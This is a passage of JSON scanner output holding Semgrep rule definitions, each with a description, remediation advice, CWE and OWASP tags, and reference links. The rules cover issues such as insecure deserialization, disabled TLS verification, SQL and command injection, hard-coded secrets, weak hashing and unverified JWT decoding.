JSON, a malicious string may cause the decoder to consume considerable CPU and memory resources. Limiting the size of data to be parsed is recommended."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) Even for a data-only serialization format such as JSON, a malicious string may cause the decoder to consume considerable CPU and memory resources. Limiting the size of data to be parsed is recommended.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.pyramid.deserialization.tainted-json-pyramid.tainted-json-pyramid)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n - [https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html](https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html)\n - [https://docs.python.org/3/library/json.html](https://docs.python.org/3/library/json.html)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n - [https://davidhamann.de/2020/04/05/exploiting-python-pickle/](https://davidhamann.de/2020/04/05/exploiting-python-pickle/)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) Even for a data-only serialization format such as JSON, a malicious string may cause the decoder to consume considerable CPU and memory resources. Limiting the size of data to be parsed is recommended."},"helpUri":"https://semgrep.dev/r/python.pyramid.deserialization.tainted-json-pyramid.tainted-json-pyramid","id":"python.pyramid.deserialization.tainted-json-pyramid.tainted-json-pyramid","name":"python.pyramid.deserialization.tainted-json-pyramid.tainted-json-pyramid","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.pyramid.deserialization.tainted-json-pyramid.tainted-json-pyramid"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Checks for setting the environment variable NODE_TLS_REJECT_UNAUTHORIZED to 0, which disables TLS verification. This should only be used for debugging purposes. Setting the option rejectUnauthorized to false bypasses verification against the list of trusted CAs, which also leads to insecure transport. These options lead to vulnerability to MTM attacks, and should not be used."},"help":{"markdown":"Checks for setting the environment variable NODE_TLS_REJECT_UNAUTHORIZED to 0, which disables TLS verification. This should only be used for debugging purposes. Setting the option rejectUnauthorized to false bypasses verification against the list of trusted CAs, which also leads to insecure transport. These options lead to vulnerability to MTM attacks, and should not be used.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/problem-based-packs.insecure-transport.js-node.bypass-tls-verification.bypass-tls-verification)\n - [https://nodejs.org/api/https.html#https_https_request_options_callback](https://nodejs.org/api/https.html#https_https_request_options_callback)\n - [https://stackoverflow.com/questions/20433287/node-js-request-cert-has-expired#answer-29397100](https://stackoverflow.com/questions/20433287/node-js-request-cert-has-expired#answer-29397100)\n","text":"Checks for setting the environment variable NODE_TLS_REJECT_UNAUTHORIZED to 0, which disables TLS verification. This should only be used for debugging purposes. Setting the option rejectUnauthorized to false bypasses verification against the list of trusted CAs, which also leads to insecure transport. These options lead to vulnerability to MTM attacks, and should not be used."},"helpUri":"https://semgrep.dev/r/problem-based-packs.insecure-transport.js-node.bypass-tls-verification.bypass-tls-verification","id":"problem-based-packs.insecure-transport.js-node.bypass-tls-verification.bypass-tls-verification","name":"problem-based-packs.insecure-transport.js-node.bypass-tls-verification.bypass-tls-verification","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: problem-based-packs.insecure-transport.js-node.bypass-tls-verification.bypass-tls-verification"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"A specially crafted calldata may be used to impersonate other accounts"},"help":{"markdown":"A specially crafted calldata may be used to impersonate other accounts\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/solidity.security.superfluid-ctx-injection.superfluid-ctx-injection)\n - [https://rekt.news/superfluid-rekt/](https://rekt.news/superfluid-rekt/)\n - [https://medium.com/superfluid-blog/08-02-22-exploit-post-mortem-15ff9c97cdd](https://medium.com/superfluid-blog/08-02-22-exploit-post-mortem-15ff9c97cdd)\n - [https://polygonscan.com/address/0x07711bb6dfbc99a1df1f2d7f57545a67519941e7](https://polygonscan.com/address/0x07711bb6dfbc99a1df1f2d7f57545a67519941e7)\n","text":"A specially crafted calldata may be used to impersonate other accounts"},"helpUri":"https://semgrep.dev/r/solidity.security.superfluid-ctx-injection.superfluid-ctx-injection","id":"solidity.security.superfluid-ctx-injection.superfluid-ctx-injection","name":"solidity.security.superfluid-ctx-injection.superfluid-ctx-injection","properties":{"precision":"very-high","tags":["CWE-20: Improper Input Validation","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: solidity.security.superfluid-ctx-injection.superfluid-ctx-injection"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected a Storage that was not configured to deny action by default. Add `default_action = \"Deny\"` in your resource block."},"help":{"markdown":"Detected a Storage that was not configured to deny action by default. Add `default_action = \"Deny\"` in your resource block.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.azure.security.storage.storage-default-action-deny.storage-default-action-deny)\n - [https://registry.terraform.io/providers/hashicorp/azurerm/latest/docs/resources/storage_account_network_rules#default_action](https://registry.terraform.io/providers/hashicorp/azurerm/latest/docs/resources/storage_account_network_rules#default_action)\n - [https://docs.microsoft.com/en-us/azure/firewall/rule-processing](https://docs.microsoft.com/en-us/azure/firewall/rule-processing)\n","text":"Detected a Storage that was not configured to deny action by default. Add `default_action = \"Deny\"` in your resource block."},"helpUri":"https://semgrep.dev/r/terraform.azure.security.storage.storage-default-action-deny.storage-default-action-deny","id":"terraform.azure.security.storage.storage-default-action-deny.storage-default-action-deny","name":"terraform.azure.security.storage.storage-default-action-deny.storage-default-action-deny","properties":{"precision":"very-high","tags":["CWE-16: CWE CATEGORY: Configuration","LOW CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","OWASP-A06:2017 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.azure.security.storage.storage-default-action-deny.storage-default-action-deny"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The AWS SSM logs are unencrypted or disabled. Please enable logs and use AWS KMS encryption key to protect SSM logs. To create your own, create a aws_kms_key resource or use the ARN string of a key in your account."},"help":{"markdown":"The AWS SSM logs are unencrypted or disabled. Please enable logs and use AWS KMS encryption key to protect SSM logs. To create your own, create a aws_kms_key resource or use the ARN string of a key in your account.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-ssm-document-logging-issues.aws-ssm-document-logging-issues)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"The AWS SSM logs are unencrypted or disabled. Please enable logs and use AWS KMS encryption key to protect SSM logs. To create your own, create a aws_kms_key resource or use the ARN string of a key in your account."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-ssm-document-logging-issues.aws-ssm-document-logging-issues","id":"terraform.aws.security.aws-ssm-document-logging-issues.aws-ssm-document-logging-issues","name":"terraform.aws.security.aws-ssm-document-logging-issues.aws-ssm-document-logging-issues","properties":{"precision":"very-high","tags":["CWE-326: Inadequate Encryption Strength","LOW CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-ssm-document-logging-issues.aws-ssm-document-logging-issues"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected a formatted string in a SQL statement. This could lead to SQL injection if variables in the SQL statement are not properly sanitized. Use a prepared statements (java.sql.PreparedStatement) instead. You can obtain a PreparedStatement using 'connection.prepareStatement'."},"help":{"markdown":"Detected a formatted string in a SQL statement. This could lead to SQL injection if variables in the SQL statement are not properly sanitized. Use a prepared statements (java.sql.PreparedStatement) instead. You can obtain a PreparedStatement using 'connection.prepareStatement'.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.sqli.hibernate-sqli.hibernate-sqli)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Detected a formatted string in a SQL statement. This could lead to SQL injection if variables in the SQL statement are not properly sanitized. Use a prepared statements (java.sql.PreparedStatement) instead. You can obtain a PreparedStatement using 'connection.prepareStatement'."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.sqli.hibernate-sqli.hibernate-sqli","id":"java.lang.security.audit.sqli.hibernate-sqli.hibernate-sqli","name":"java.lang.security.audit.sqli.hibernate-sqli.hibernate-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","LOW CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.sqli.hibernate-sqli.hibernate-sqli"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.mssql.node-mssql-hardcoded-secret.node-mssql-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/javascript.mssql.node-mssql-hardcoded-secret.node-mssql-hardcoded-secret","id":"javascript.mssql.node-mssql-hardcoded-secret.node-mssql-hardcoded-secret","name":"javascript.mssql.node-mssql-hardcoded-secret.node-mssql-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.mssql.node-mssql-hardcoded-secret.node-mssql-hardcoded-secret"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_pickle()` function uses `pickle` for object deserialization and should not be used with untrusted data."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_pickle()` function uses `pickle` for object deserialization and should not be used with untrusted data.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.deserialization.tainted-pandas-pickle.tainted-pandas-pickle)\n - [https://davidhamann.de/2020/04/05/exploiting-python-pickle/](https://davidhamann.de/2020/04/05/exploiting-python-pickle/)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n - [https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html](https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://pandas.pydata.org/docs/reference/api/pandas.read_pickle.html](https://pandas.pydata.org/docs/reference/api/pandas.read_pickle.html)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n - [https://redfoxsec.com/blog/insecure-deserialization-in-python/](https://redfoxsec.com/blog/insecure-deserialization-in-python/)\n - [https://www.exploit-db.com/exploits/49585](https://www.exploit-db.com/exploits/49585)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_pickle()` function uses `pickle` for object deserialization and should not be used with untrusted data."},"helpUri":"https://semgrep.dev/r/python.lang.deserialization.tainted-pandas-pickle.tainted-pandas-pickle","id":"python.lang.deserialization.tainted-pandas-pickle.tainted-pandas-pickle","name":"python.lang.deserialization.tainted-pandas-pickle.tainted-pandas-pickle","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.deserialization.tainted-pandas-pickle.tainted-pandas-pickle"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Should not use SHA1 to generate hashes. There is a proven SHA1 hash collision by Google, which could lead to vulnerabilities. Use SHA256, SHA3 or other hashing functions instead."},"help":{"markdown":"Should not use SHA1 to generate hashes. There is a proven SHA1 hash collision by Google, which could lead to vulnerabilities. Use SHA256, SHA3 or other hashing functions instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.lang.security.weak-hashes-sha1.weak-hashes-sha1)\n - [https://security.googleblog.com/2017/02/announcing-first-sha1-collision.html](https://security.googleblog.com/2017/02/announcing-first-sha1-collision.html)\n - [https://shattered.io/](https://shattered.io/)\n","text":"Should not use SHA1 to generate hashes. There is a proven SHA1 hash collision by Google, which could lead to vulnerabilities. Use SHA256, SHA3 or other hashing functions instead."},"helpUri":"https://semgrep.dev/r/ruby.lang.security.weak-hashes-sha1.weak-hashes-sha1","id":"ruby.lang.security.weak-hashes-sha1.weak-hashes-sha1","name":"ruby.lang.security.weak-hashes-sha1.weak-hashes-sha1","properties":{"precision":"very-high","tags":["CWE-328: Use of Weak Hash","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.lang.security.weak-hashes-sha1.weak-hashes-sha1"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Flask-Login provides session protection to help prevent user sessions from being stolen. When this is active, sessions will be marked as non-fresh when the user's IP or user agent is changed. It is not advised to disable this feature."},"help":{"markdown":"Flask-Login provides session protection to help prevent user sessions from being stolen. When this is active, sessions will be marked as non-fresh when the user's IP or user agent is changed. It is not advised to disable this feature.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.web.flask-login-session-protection-app-config-none.flask-login-session-protection-app-config-none)\n - [https://flask-login.readthedocs.io/en/latest/#session-protection](https://flask-login.readthedocs.io/en/latest/#session-protection)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"Flask-Login provides session protection to help prevent user sessions from being stolen. When this is active, sessions will be marked as non-fresh when the user's IP or user agent is changed. It is not advised to disable this feature."},"helpUri":"https://semgrep.dev/r/python.flask.web.flask-login-session-protection-app-config-none.flask-login-session-protection-app-config-none","id":"python.flask.web.flask-login-session-protection-app-config-none.flask-login-session-protection-app-config-none","name":"python.flask.web.flask-login-session-protection-app-config-none.flask-login-session-protection-app-config-none","properties":{"precision":"very-high","tags":["CWE-613: Insufficient Session Expiration","HIGH CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.web.flask-login-session-protection-app-config-none.flask-login-session-protection-app-config-none"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected user input entering a `subprocess` call unsafely. This could result in a command injection vulnerability. An attacker could use this vulnerability to execute arbitrary commands on the host, which allows them to download malware, scan sensitive data, or run any command they wish on the server. Do not let users choose the command to run. In general, prefer to use Python API versions of system commands. If you must use subprocess, use a dictionary to allowlist a set of commands."},"help":{"markdown":"Detected user input entering a `subprocess` call unsafely. This could result in a command injection vulnerability. An attacker could use this vulnerability to execute arbitrary commands on the host, which allows them to download malware, scan sensitive data, or run any command they wish on the server. Do not let users choose the command to run. In general, prefer to use Python API versions of system commands. If you must use subprocess, use a dictionary to allowlist a set of commands.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.security.injection.subprocess-injection.subprocess-injection)\n - [https://semgrep.dev/docs/cheat-sheets/python-command-injection/](https://semgrep.dev/docs/cheat-sheets/python-command-injection/)\n","text":"Detected user input entering a `subprocess` call unsafely. This could result in a command injection vulnerability. An attacker could use this vulnerability to execute arbitrary commands on the host, which allows them to download malware, scan sensitive data, or run any command they wish on the server. Do not let users choose the command to run. In general, prefer to use Python API versions of system commands. If you must use subprocess, use a dictionary to allowlist a set of commands."},"helpUri":"https://semgrep.dev/r/python.flask.security.injection.subprocess-injection.subprocess-injection","id":"python.flask.security.injection.subprocess-injection.subprocess-injection","name":"python.flask.security.injection.subprocess-injection.subprocess-injection","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.security.injection.subprocess-injection.subprocess-injection"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"DSA is a legacy algorithm and should generally be avoided in favor of choices like EdDSA using curve25519 or ECDSA. In general, low-level cryptographic primitives, found in the `cryptography.hazmat package`, are complex and potentially dangerous, requiring deep cryptographic knowledge. It is recommended to use the higher-level recipes layer as a secure default and resort to the hazmat layer only when necessary."},"help":{"markdown":"DSA is a legacy algorithm and should generally be avoided in favor of choices like EdDSA using curve25519 or ECDSA. In general, low-level cryptographic primitives, found in the `cryptography.hazmat package`, are complex and potentially dangerous, requiring deep cryptographic knowledge. It is recommended to use the higher-level recipes layer as a secure default and resort to the hazmat layer only when necessary.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.cryptography.cryptography-dsa.cryptography-dsa)\n - [https://cryptography.io/en/latest/hazmat/primitives/asymmetric/dsa/](https://cryptography.io/en/latest/hazmat/primitives/asymmetric/dsa/)\n - [https://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.186-5.pdf](https://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.186-5.pdf)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n - [https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/09-Testing_for_Weak_Cryptography/04-Testing_for_Weak_Encryption](https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/09-Testing_for_Weak_Cryptography/04-Testing_for_Weak_Encryption)\n - [https://words.filippo.io/dispatches/dsa/](https://words.filippo.io/dispatches/dsa/)\n","text":"DSA is a legacy algorithm and should generally be avoided in favor of choices like EdDSA using curve25519 or ECDSA. In general, low-level cryptographic primitives, found in the `cryptography.hazmat package`, are complex and potentially dangerous, requiring deep cryptographic knowledge. It is recommended to use the higher-level recipes layer as a secure default and resort to the hazmat layer only when necessary."},"helpUri":"https://semgrep.dev/r/python.cryptography.cryptography-dsa.cryptography-dsa","id":"python.cryptography.cryptography-dsa.cryptography-dsa","name":"python.cryptography.cryptography-dsa.cryptography-dsa","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: python.cryptography.cryptography-dsa.cryptography-dsa"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Detected a cookie options with the `SameSite` flag set to \"None\". This is a potential security risk that arises from the way web browsers manage cookies. In a typical web application, cookies are used to store and transmit session-related data between a client and a server. To enhance security, cookies can be marked with the \"SameSite\" attribute, which restricts their usage based on the origin of the page that set them. This attribute can have three values: \"Strict,\" \"Lax,\" or \"None\". Make sure that the choice of the `None` value is intentional and that you understand the potential security implications. When `SameSite` is set to \"Strict\", no 3rd party cookie will be sent with outgoing requests. While 'Strict' is the most secure option, 'Lax' is a good compromise between security and usability and this default value is secure for most applications. A secure default approach would consist of creating a custom response class, overriding the `set_cookie` method to set this flag to `Lax` by default, setting the `response_class` attribute of your Flask app to use the custom response class, setting the flag a different value on a case-by-case basis only when necessary."},"help":{"markdown":"Detected a cookie options with the `SameSite` flag set to \"None\". This is a potential security risk that arises from the way web browsers manage cookies. In a typical web application, cookies are used to store and transmit session-related data between a client and a server. To enhance security, cookies can be marked with the \"SameSite\" attribute, which restricts their usage based on the origin of the page that set them. This attribute can have three values: \"Strict,\" \"Lax,\" or \"None\". Make sure that the choice of the `None` value is intentional and that you understand the potential security implications. When `SameSite` is set to \"Strict\", no 3rd party cookie will be sent with outgoing requests. While 'Strict' is the most secure option, 'Lax' is a good compromise between security and usability and this default value is secure for most applications. A secure default approach would consist of creating a custom response class, overriding the `set_cookie` method to set this flag to `Lax` by default, setting the `response_class` attribute of your Flask app to use the custom response class, setting the flag a different value on a case-by-case basis only when necessary.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.web.flask-cookie-samesite-missing.flask-cookie-samesite-missing)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://web.dev/articles/samesite-cookies-explained](https://web.dev/articles/samesite-cookies-explained)\n","text":"Detected a cookie options with the `SameSite` flag set to \"None\". This is a potential security risk that arises from the way web browsers manage cookies. In a typical web application, cookies are used to store and transmit session-related data between a client and a server. To enhance security, cookies can be marked with the \"SameSite\" attribute, which restricts their usage based on the origin of the page that set them. This attribute can have three values: \"Strict,\" \"Lax,\" or \"None\". Make sure that the choice of the `None` value is intentional and that you understand the potential security implications. When `SameSite` is set to \"Strict\", no 3rd party cookie will be sent with outgoing requests. While 'Strict' is the most secure option, 'Lax' is a good compromise between security and usability and this default value is secure for most applications. A secure default approach would consist of creating a custom response class, overriding the `set_cookie` method to set this flag to `Lax` by default, setting the `response_class` attribute of your Flask app to use the custom response class, setting the flag a different value on a case-by-case basis only when necessary."},"helpUri":"https://semgrep.dev/r/python.flask.web.flask-cookie-samesite-missing.flask-cookie-samesite-missing","id":"python.flask.web.flask-cookie-samesite-missing.flask-cookie-samesite-missing","name":"python.flask.web.flask-cookie-samesite-missing.flask-cookie-samesite-missing","properties":{"precision":"very-high","tags":["CWE-1275: Sensitive Cookie with Improper SameSite Attribute","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.web.flask-cookie-samesite-missing.flask-cookie-samesite-missing"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files."},"help":{"markdown":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.file.tainted-path-traversal-pillow-django.tainted-path-traversal-pillow-django)\n - [https://docs.pyfilesystem.org/en/latest/guide.html#opening-filesystems](https://docs.pyfilesystem.org/en/latest/guide.html#opening-filesystems)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n - [https://portswigger.net/web-security/file-path-traversal](https://portswigger.net/web-security/file-path-traversal)\n - [https://www.stackhawk.com/blog/django-path-traversal-guide-examples-and-prevention/](https://www.stackhawk.com/blog/django-path-traversal-guide-examples-and-prevention/)\n","text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files."},"helpUri":"https://semgrep.dev/r/python.django.file.tainted-path-traversal-pillow-django.tainted-path-traversal-pillow-django","id":"python.django.file.tainted-path-traversal-pillow-django.tainted-path-traversal-pillow-django","name":"python.django.file.tainted-path-traversal-pillow-django.tainted-path-traversal-pillow-django","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.file.tainted-path-traversal-pillow-django.tainted-path-traversal-pillow-django"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected the decoding of a JWT token without a verify step. JWT tokens must be verified before use, otherwise the token's integrity is unknown. This means a malicious actor could forge a JWT token with any claims. Validate the token before using it."},"help":{"markdown":"Detected the decoding of a JWT token without a verify step. JWT tokens must be verified before use, otherwise the token's integrity is unknown. This means a malicious actor could forge a JWT token with any claims. Validate the token before using it.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.dotnet-core.jwt.jwt-decode-without-verify.jwt-decode-without-verify)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n","text":"Detected the decoding of a JWT token without a verify step. JWT tokens must be verified before use, otherwise the token's integrity is unknown. This means a malicious actor could forge a JWT token with any claims. Validate the token before using it."},"helpUri":"https://semgrep.dev/r/csharp.dotnet-core.jwt.jwt-decode-without-verify.jwt-decode-without-verify","id":"csharp.dotnet-core.jwt.jwt-decode-without-verify.jwt-decode-without-verify","name":"csharp.dotnet-core.jwt.jwt-decode-without-verify.jwt-decode-without-verify","properties":{"precision":"very-high","tags":["CWE-345: Insufficient Verification of Data Authenticity","HIGH CONFIDENCE","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.dotnet-core.jwt.jwt-decode-without-verify.jwt-decode-without-verify"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"help":{"markdown":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/cpp.lang.security.system-command.command-injection-path.command-injection-path)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://wiki.sei.cmu.edu/confluence/display/c/STR02-C.+Sanitize+data+passed+to+complex+subsystems](https://wiki.sei.cmu.edu/confluence/display/c/STR02-C.+Sanitize+data+passed+to+complex+subsystems)\n","text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"helpUri":"https://semgrep.dev/r/cpp.lang.security.system-command.command-injection-path.command-injection-path","id":"cpp.lang.security.system-command.command-injection-path.command-injection-path","name":"cpp.lang.security.system-command.command-injection-path.command-injection-path","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: 